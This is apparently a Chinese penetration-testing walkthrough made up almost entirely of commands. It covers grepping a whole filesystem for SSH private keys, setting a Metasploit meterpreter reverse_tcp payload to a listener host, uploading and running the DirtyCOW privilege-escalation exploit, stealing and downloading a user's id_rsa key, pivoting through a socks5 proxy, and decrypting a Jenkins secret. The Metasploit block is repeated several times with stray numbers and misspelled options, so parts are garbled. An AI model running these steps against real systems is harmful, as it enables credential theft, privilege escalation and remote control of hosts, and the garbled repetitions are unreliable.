前言
敏感文件
~/.ssh/config #配置 ssh 连接相关参数的配置文件
~/.ssh/known_hosts # 该服务器所有登录过的服务器的信息
~/.bash_history # 我们通过历史命令可以看到该服务器中有没有使用ssh私钥去远程连接服务器
搜索含有SSH凭证文件
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
场景演示
set rhost 172.16.250.10
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
upload /root/Desktop/linux-exploit-suggester.sh /tmp/aa.sh
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
chmod u+x /tmp/aa.sh
./tmp/aa.sh
upload /root/Desktop/dirtycow-mem.c /tmp/cow.c
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
gcc -Wall -o /tmp/dirtycow /tmp/cow.c -ldl -lpthread
chmod u+x /tmp/dirtycow
./tmp/dirtycow
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 /tmp/id_rsa
exit
download /tmp/id_rsa /root/is_rsa
chmod 0700 id_rsa
ssh -i id_rsa [email protected]
use auxiliary/server/socks5
set srvhost 172.16.250.128
run
proxychains firefox
2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=
println(hudson.util.Secret.fromString("{2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=}").getPlainText())
set rhost 172.16.250.10 1
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
set rhost 172.16.250.10 2
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
set rhost 172.16.250.10 3
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
set rhost 172.16.250.10 4
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
set rhost 172.16.250.10 5
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
E
N
D
还没有评论,来说两句吧...